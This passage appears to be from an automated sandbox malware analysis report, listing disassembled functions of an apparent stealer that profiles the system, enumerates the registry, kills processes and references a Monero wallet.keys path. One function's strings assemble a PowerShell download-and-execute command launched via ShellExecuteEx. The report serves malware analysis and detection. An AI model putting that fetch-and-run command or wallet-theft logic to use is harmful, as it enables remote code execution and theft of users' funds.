                                    • Associated: 00000000.00000002.2106925343.000000000049D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000007CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107374782.00000000008E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107486990.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                                    • String ID:
                                    • API String ID: 3066467675-0
                                    • Opcode ID: 172d3764200cdaca86a34d14e1f1799571ab4602f4dd8e88c92ab9bb8044da1c
                                    • Instruction ID: 109aa0434bb04e025dfef86f951d07893db05e6e1bc2c3fdb0bb4df402a3975b
                                    • Opcode Fuzzy Hash: 172d3764200cdaca86a34d14e1f1799571ab4602f4dd8e88c92ab9bb8044da1c
                                    • Instruction Fuzzy Hash: 8E3107F5E44218ABDB20CF54DC85BDDB7B5AB48704F1081E8FA09A7281D7B06EC58F98
                                    Function 00378290 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 67memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,00F3D9B0,00000000,?,00380E14,00000000,?,00000000), ref: 003782C0
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 003782C7
                                    • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 003782E8
                                    • wsprintfA.USER32 ref: 0037833C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    • Associated: 00000000.00000002.2106906466.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000038C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000049D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000007CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107374782.00000000008E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107486990.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateGlobalMemoryProcessStatuswsprintf
                                    • String ID: %d MB$@
                                    • API String ID: 2922868504-3474575989
                                    • Opcode ID: 7a590323ab7e236d605516e4d278432d02e86db9166560d99132c751c5191aa1
                                    • Instruction ID: fbaf5761f37f4da1bc7a7334092eb030704bcf67c860d1f24243fdd5baa3cc3a
                                    • Opcode Fuzzy Hash: 7a590323ab7e236d605516e4d278432d02e86db9166560d99132c751c5191aa1
                                    • Instruction Fuzzy Hash: A2211FB1E44209ABDB21DFD4CC49FAEB7B9FB44B10F104509F619BB280D77859008BA5
                                    Function 0037856C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64registrystringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 003785B6
                                    • wsprintfA.USER32 ref: 003785E9
                                    • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0037860B
                                    • RegCloseKey.ADVAPI32(00000000), ref: 0037861C
                                    • RegCloseKey.ADVAPI32(00000000), ref: 00378629
                                      • Part of subcall function 0037AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0037AAF6
                                    • RegQueryValueExA.ADVAPI32(00000000,00F3D9F8,00000000,000F003F,?,00000400), ref: 0037867C
                                    • lstrlen.KERNEL32(?), ref: 00378691
                                    • RegQueryValueExA.ADVAPI32(00000000,00F3D8D8,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00380B3C), ref: 00378729
                                    • RegCloseKey.ADVAPI32(00000000), ref: 00378798
                                    • RegCloseKey.ADVAPI32(00000000), ref: 003787AA
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    • Associated: 00000000.00000002.2106906466.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000038C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000049D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000007CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107374782.00000000008E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107486990.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                                    • String ID: %s\%s
                                    • API String ID: 3896182533-4073750446
                                    • Opcode ID: bd4f53f8f0289c34ddb778801876d6e79afbcb9b40077eb9d271091c944bf26d
                                    • Instruction ID: 16774e2c691cbeb86256689c01fdbbcadd36699aef0ed422293ef1b109bb774c
                                    • Opcode Fuzzy Hash: bd4f53f8f0289c34ddb778801876d6e79afbcb9b40077eb9d271091c944bf26d
                                    • Instruction Fuzzy Hash: 342116B1A5021CABDB24DB54DC85FE9B3B9FB48700F10C1D8E609A6180DF75AA85CFE4
                                    Function 003799A0 Relevance: 10.6, APIs: 7, Instructions: 60processCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 003799C5
                                    • Process32First.KERNEL32(0036A056,00000128), ref: 003799D9
                                    • Process32Next.KERNEL32(0036A056,00000128), ref: 003799F2
                                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00379A4E
                                    • TerminateProcess.KERNEL32(00000000,00000000), ref: 00379A6C
                                    • CloseHandle.KERNEL32(00000000), ref: 00379A79
                                    • CloseHandle.KERNEL32(0036A056), ref: 00379A88
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    • Associated: 00000000.00000002.2106906466.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000038C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000049D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000007CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107374782.00000000008E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107486990.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
                                    • String ID:
                                    • API String ID: 2696918072-0
                                    • Opcode ID: a58426ca7db41799aca6a155979b6e3ecec69640230b8f0d9b86aa1e079c4ae9
                                    • Instruction ID: 3bf3c64df6a165853571e8dd640d412c6f80202b4cc0eb4653c4ad4d76f54f8d
                                    • Opcode Fuzzy Hash: a58426ca7db41799aca6a155979b6e3ecec69640230b8f0d9b86aa1e079c4ae9
                                    • Instruction Fuzzy Hash: 0121ECB19042189BDB71DF51DC89BDDB7B9BB48304F1081C9E509A6290D7749B84CF90
                                    Function 00377820 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43registrymemoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00377834
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 0037783B
                                    • RegOpenKeyExA.ADVAPI32(80000002,00F2B9D8,00000000,00020119,00000000), ref: 0037786D
                                    • RegQueryValueExA.ADVAPI32(00000000,00F3DAA0,00000000,00000000,?,000000FF), ref: 0037788E
                                    • RegCloseKey.ADVAPI32(00000000), ref: 00377898
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    • Associated: 00000000.00000002.2106906466.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000038C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000049D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000007CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107374782.00000000008E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107486990.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                    • String ID: Windows 11
                                    • API String ID: 3225020163-2517555085
                                    • Opcode ID: f9ded46f66d1e0165510c489270604b4cc5f9e06c1d2323f3a28d56af6949ab5
                                    • Instruction ID: 48578461f4c7e9e9d39140bf2904a9e92cc14a032698bf107231d6bea62775f7
                                    • Opcode Fuzzy Hash: f9ded46f66d1e0165510c489270604b4cc5f9e06c1d2323f3a28d56af6949ab5
                                    • Instruction Fuzzy Hash: A10117B5A48305BBE710DBD4DD4AF6E7779EF48701F104094F60997290D7749A04DB91
                                    Function 003778B0 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 42registrymemoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 003778C4
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 003778CB
                                    • RegOpenKeyExA.ADVAPI32(80000002,00F2B9D8,00000000,00020119,00377849), ref: 003778EB
                                    • RegQueryValueExA.ADVAPI32(00377849,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 0037790A
                                    • RegCloseKey.ADVAPI32(00377849), ref: 00377914
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    • Associated: 00000000.00000002.2106906466.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000038C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000049D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000007CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107374782.00000000008E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107486990.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                    • String ID: CurrentBuildNumber
                                    • API String ID: 3225020163-1022791448
                                    • Opcode ID: 1c74792c6b974a88107961555f582a6215f29b98b61b6a6e32ab8de8350f88ef
                                    • Instruction ID: 62e4594535247135c3dca09c35ef2c421b2203253955060344bf5a657a570c16
                                    • Opcode Fuzzy Hash: 1c74792c6b974a88107961555f582a6215f29b98b61b6a6e32ab8de8350f88ef
                                    • Instruction Fuzzy Hash: 2B01F4B5A44309BBEB10DBD4DC49FAE7779EB44705F104594F605A6281D774AA00CB90
                                    Function 00379470 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateFileA.KERNEL32(>=7,80000000,00000003,00000000,00000003,00000080,00000000,?,00373D3E,?), ref: 0037948C
                                    • GetFileSizeEx.KERNEL32(000000FF,>=7), ref: 003794A9
                                    • CloseHandle.KERNEL32(000000FF), ref: 003794B7
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    • Associated: 00000000.00000002.2106906466.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000038C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000049D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000007CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107374782.00000000008E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107486990.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: File$CloseCreateHandleSize
                                    • String ID: >=7$>=7
                                    • API String ID: 1378416451-488991958
                                    • Opcode ID: 033e779b966fe14f60b6c1aeb90a5f813d39904ef69fe36fbbd617b2f32bc4ef
                                    • Instruction ID: 73d5c1f5c93caa942da34bf3ea8be44d5d6e0d1abfd5a1dc780e3da52c7b80ba
                                    • Opcode Fuzzy Hash: 033e779b966fe14f60b6c1aeb90a5f813d39904ef69fe36fbbd617b2f32bc4ef
                                    • Instruction Fuzzy Hash: E8F06279E04208BBDB20DFB1EC49F9E77BAAB48710F10C654FA55A72C0D67496019F80
                                    Function 0036A110 Relevance: 9.1, APIs: 6, Instructions: 82filememoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0036A13C
                                    • GetFileSizeEx.KERNEL32(000000FF,?), ref: 0036A161
                                    • LocalAlloc.KERNEL32(00000040,?), ref: 0036A181
                                    • ReadFile.KERNEL32(000000FF,?,00000000,0036148F,00000000), ref: 0036A1AA
                                    • LocalFree.KERNEL32(0036148F), ref: 0036A1E0
                                    • CloseHandle.KERNEL32(000000FF), ref: 0036A1EA
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    • Associated: 00000000.00000002.2106906466.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000038C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000049D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000007CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107374782.00000000008E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107486990.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                    • String ID:
                                    • API String ID: 2311089104-0
                                    • Opcode ID: c3d983159ce8fe38d05b1c4e98cad19f3479f02775de32fe25913077153a65ce
                                    • Instruction ID: 7935bf8b97eed37361d86cd2b78097cee1d2e737ee90369b1d25c764aebf4d13
                                    • Opcode Fuzzy Hash: c3d983159ce8fe38d05b1c4e98cad19f3479f02775de32fe25913077153a65ce
                                    • Instruction Fuzzy Hash: 81310BB4A00209EFDB25CFA4CC85BEE7BB5FF49300F108158E911A7294D774AA81CFA1
                                    Function 003749D0 Relevance: 8.9, APIs: 7, Instructions: 101stringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • lstrcat.KERNEL32(?,00F3DB48), ref: 00374A2B
                                      • Part of subcall function 00378F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00378F9B
                                    • lstrcat.KERNEL32(?,00000000), ref: 00374A51
                                    • lstrcat.KERNEL32(?,?), ref: 00374A70
                                    • lstrcat.KERNEL32(?,?), ref: 00374A84
                                    • lstrcat.KERNEL32(?,00F2AFA0), ref: 00374A97
                                    • lstrcat.KERNEL32(?,?), ref: 00374AAB
                                    • lstrcat.KERNEL32(?,00F3D6D8), ref: 00374ABF
                                      • Part of subcall function 0037AA50: lstrcpy.KERNEL32(00380E1A,00000000), ref: 0037AA98
                                      • Part of subcall function 00378F20: GetFileAttributesA.KERNEL32(00000000,?,00361B94,?,?,0038577C,?,?,00380E22), ref: 00378F2F
                                      • Part of subcall function 003747C0: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 003747D0
                                      • Part of subcall function 003747C0: RtlAllocateHeap.NTDLL(00000000), ref: 003747D7
                                      • Part of subcall function 003747C0: wsprintfA.USER32 ref: 003747F6
                                      • Part of subcall function 003747C0: FindFirstFileA.KERNEL32(?,?), ref: 0037480D
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    • Associated: 00000000.00000002.2106906466.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000038C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000049D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000007CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107374782.00000000008E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107486990.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                                    • String ID:
                                    • API String ID: 2540262943-0
                                    • Opcode ID: 06c15a5e542deb1e7da22580aeb1f32b445b7bf417515968ac952d32187c5d06
                                    • Instruction ID: dbb4be9cdace12367d1951d5ad1ab0afabdb3ec62e9029ebd32cd9b95206d8b4
                                    • Opcode Fuzzy Hash: 06c15a5e542deb1e7da22580aeb1f32b445b7bf417515968ac952d32187c5d06
                                    • Instruction Fuzzy Hash: 153152F2940218A7DB35FBB0DC99EDE733DAB48700F408589B6599A051EE74A7C8CBD4
                                    Function 00372EE0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 99COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0037AA50: lstrcpy.KERNEL32(00380E1A,00000000), ref: 0037AA98
                                      • Part of subcall function 0037ACC0: lstrlen.KERNEL32(?,00F38980,?,\Monero\wallet.keys,00380E1A), ref: 0037ACD5
                                      • Part of subcall function 0037ACC0: lstrcpy.KERNEL32(00000000), ref: 0037AD14
                                      • Part of subcall function 0037ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0037AD22
                                      • Part of subcall function 0037AC30: lstrcpy.KERNEL32(00000000,?), ref: 0037AC82
                                      • Part of subcall function 0037AC30: lstrcat.KERNEL32(00000000), ref: 0037AC92
                                      • Part of subcall function 0037ABB0: lstrcpy.KERNEL32(?,00380E1A), ref: 0037AC15
                                    • ShellExecuteEx.SHELL32(0000003C), ref: 00372FD5
                                    Strings
                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00372F54
                                    • <, xrefs: 00372F89
                                    • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00372F14
                                    • ')", xrefs: 00372F03
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    • Associated: 00000000.00000002.2106906466.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000038C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000049D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000007CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008D5000.00000040.00000001.01000000.00000003.sdmpDownload File
